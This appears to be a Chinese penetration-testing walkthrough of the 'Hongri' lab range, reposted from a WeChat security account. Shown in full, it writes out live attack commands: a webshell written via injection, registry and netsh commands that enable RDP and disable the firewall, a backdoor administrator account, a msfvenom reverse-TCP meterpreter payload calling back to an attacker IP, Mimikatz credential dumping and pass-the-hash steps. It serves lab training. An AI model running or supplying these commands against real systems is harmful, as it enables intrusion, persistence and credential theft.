1,先通过漏洞打入内网,获取权限,查看权限如果是普通权限就进行提权,提权之后,通过文件上传回连马植入后门,之后上传木马进行内网信息探测,看看有没有域,如果有的话,进行域内信息收集,之后进行内网渗透,通过开启的端口查找端口漏洞,进行攻击
在网络安全领域,横向移动(Lateral Movement)是指攻击者在成功侵入企业网络系统的某一点后,利用该点的访问权限,通过内部网络进一步渗透到其他系统或设备,以扩大攻击范围并获取更多敏感信息或控制权限的行为。
- 内部渗透:横向移动主要发生在企业内部网络中,攻击者利用已控制的系统作为跳板,进一步攻击其他系统。
- 权限提升:攻击者通过横向移动,可能会获取到更高权限的访问权限,从而能够访问更多敏感信息或控制系统。
- 隐蔽性:由于横向移动发生在内部网络中,攻击行为可能更加隐蔽,难以被传统的边界防御设备检测到。
- 侦察:攻击者首先会对目标网络进行侦察,收集目标系统的信息,如开放的端口、运行的服务等。
- 渗透:利用已发现的漏洞或弱点,攻击者成功侵入目标网络中的某一系统。
- 横向移动:在成功侵入后,攻击者会利用该系统的访问权限,进一步渗透到其他系统或设备中。
- 数据窃取或破坏:最终,攻击者可能会窃取敏感信息、破坏数据或控制系统。
目标一些信息
扫描出来的跳转路径
发现页面是这个,先在网上找找历史漏洞
Documetation.html Documetation.txt translators.html readme.php README changelog.php Change
目录后面添加以上的文件,逐个尝试就可以看到phpmyadmin的相关版本信息了(前提是管理员没有把记录版本信息的文件删除掉)
通过密探获取到敏感信息
扫描到文件下载
注入写入木马
连接木马
shell开启3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭防火墙
netsh firewall set opmode disable
添加账户、加进管理员组
net user
net user hack01 1324@cbD /add
net localgroup Administrators hack01 /add
net user
rdesktop 远程连接3389
通过账号密码成功登录
发现www下面还有文件位置,进行访问,获得信息
成功登录
前台模板写入一句话木马
hackbar传入x=phpinfo函数可以显示出PHP 所有相关信息。是排查配置php是是否出错或漏配置模块的主要方式之一!
通过蚁剑连接
反弹 Shell(Reverse Shell) 反弹 Shell 是一种技术,允许攻击者在受害者的计算机上执行远程命令。与传统的 Shell 不同,反弹 Shell 需要受害者的计算机主动连接到攻击者的计算机。这种连接通常是通过命令行工具(如 Netcat、nc、或脚本语言)实现的。以下是反弹 Shell 的一些特点:
主动连接:受害者的计算机(客户端)主动发起连接到攻击者的计算机(服务器)。 交互式控制:一旦建立连接,攻击者可以通过一个交互式的命令行界面控制受害者的计算机。 简单实现:可以使用一行命令或简单的脚本实现反弹 Shell。 用途多样:可以用于合法的远程管理,也可以用于非法的远程控制。 回连马是一类恶意软件,旨在在受害者的计算机上创建一个隐蔽的入口,允许攻击者远程控制或访问受害者的系统。回连马可以采取多种形式,包括但不限于反弹 Shell。以下是回连马的一些特点:
隐蔽性:回连马设计得非常隐蔽,以避免被用户或安全软件发现。 持久性:回连马通常具有持久性,能够在系统重启后继续存在。 多种功能:除了创建反弹 Shell,回连马还可以执行其他恶意行为,如文件操作、键盘记录、下载其他恶意软件等。 控制与通信:回连马可能包含一个命令和控制(C2)服务器,攻击者可以通过它来管理和控制受感染的计算机。 反弹 shell(Reverse Shell)和回连马(Backdoor,特别指反弹类型的Backdoor,通常称为Reverse Shell Backdoor或简称Reverse Backdoor)是网络安全领域中的两个概念,它们在某些方面相似,但也有区别:
定义:反弹 Shell 是创建反向连接的一种具体技术,而回连马是包含多种技术的恶意软件类别。 范围:反弹 Shell 主要关注于提供反向的命令行访问,而回连马可能包含更广泛的远程控制功能。 目的:反弹 Shell 可以用于合法的远程管理(如系统管理员的远程维护),而回连马通常用于非法的远程控制和数据窃取。 复杂性:回连马通常比单一的反弹 Shell 更加复杂,可能包含多个组件和功能。 在实际使用中,反弹 Shell 可以被视为回连马的一种形式,但回连马的范围更广,包含了更多的功能和可能性。无论是反弹 Shell 还是回连马,它们都应在法律允许的范围内使用,通常是在获得授权的渗透测试和安全评估中。对于个人和组织来说,了解这些技术的原理和防御措施是非常重要的。
通过蚁剑上传64.exe回连马
在信息收集的时候系统版本也是要收集的
木马一直无法上线,后面是教程里面的信息
通过更改网络终于连上了
使用 Mimikatz,logonpasswords,成功获取用户名和密码
先判断是否存在域,使用 shellipconfig /all 查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org
也可以执行命令 net config workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息
net view # 查看局域网内其他主机名 net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user # 查看本机用户列表 net user /domain # 查看域用户 net localgroup administrators # 查看本地管理员组(通常会有域用户) net view /domain # 查看有几个域 net user 用户名 /domain # 获取指定域用户的信息 net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net group 组名 /domain # 查看域中某工作组 net group "domain admins" /domain # 查看域管理员的名字 net group "domain computers" /domain # 查看域中的其他主机名 net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
上面发现 DNS 服务器名为 god.org,当前登录域为 GOD 再执行 net view /domain 查看有几个域(可能有多个)
通过net view
扫描出来 除了域控OWA 之外,还有一台主机ROOT-TVI862UBEH
至此内网域信息收集完毕,已知信息:域控主机:192.168.52.138,同时还存在一台域成员主机:192.168.52.141,接下来的目标就是横向渗透拿下域控
这边要开启3389,不过我前面已经连接上了
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.236.128 LPORT=1111 -f exe -o shell.exe #kali里生成msf后门文件 shell.exe 蚁剑上传到 win7上 kali里运行监听
msfconsole
use exploit/multi/handler set payload
windows/meterpreter/reverse_tcp set lhost 192.168.236.128 set lport 1111 exploit
蚁剑运行 shell.exe 得到meterpreter
192.168.52.141 win2003域成员机开启了 135、139、445端口
同理扫描一下域控机子
域控开启了80、135、139、445端口
上面既然通过永恒之蓝漏洞难以获得域控主机的 Shell,那就换一种攻击思路拿下域控吧,下面演示的是通过哈希传递攻击 PTH 拿下域控主机。
【哈希传递攻击】在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机,操作简单、威力无穷。
在域环境中,利用哈希传递攻击的渗透方式往往是这样的:
- 获得一台域主机的权限,Dump 内存获得该主机的用户密码 Hash 值;
- 通过哈希传递攻击尝试登录其他主机;
- 继续搜集 Hash 并尝试远程登录,直到获得域管理员账户 Hash,登录域控,最终成功控制整个域。
下面使用 Metasploit/CS 来进行本靶场环境的进行 PTH 攻击演示:
前面我们也有提到过,在win7 上线CS时,我们可以右键会话 →执行 → Run Mimikatz 直接借助 CS 进行用户哈希凭证窃取
因为无法提权,就不继续了
原文始发于微信公众号(鼎新安全):红日一靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论